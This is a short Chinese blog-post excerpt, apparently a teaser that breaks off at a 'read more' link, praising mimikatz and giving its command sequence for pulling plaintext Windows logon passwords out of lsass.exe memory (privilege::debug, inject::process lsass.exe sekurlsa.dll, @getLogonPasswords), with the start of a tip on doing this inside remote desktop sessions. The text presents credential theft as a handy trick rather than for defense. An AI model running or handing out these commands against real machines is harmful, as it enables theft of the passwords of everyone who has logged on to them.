摘要： mimikatz是法国人写的，windows下的轻量级调试器。可以直接抓取windows的口令。只要没有重启，登录过的账户口令都可以抓到。牛。抓取 lsass.exe 中的用户明文密码：//提升权限 privilege::debug //注入dll inject::process lsass.exe sekurlsa.dll //抓取密码 @getLogonPasswords 在远程终端（3389、mstsc.exe）、虚拟桌面中抓取密码的方法：通常你在远程终端中运行该程序会提示：存储空间不足，无法处理此命令。这是因为在终端模式下，不能插入远线程，跨会话不能注入，你需要使用如下方法执行该程.. 阅读全文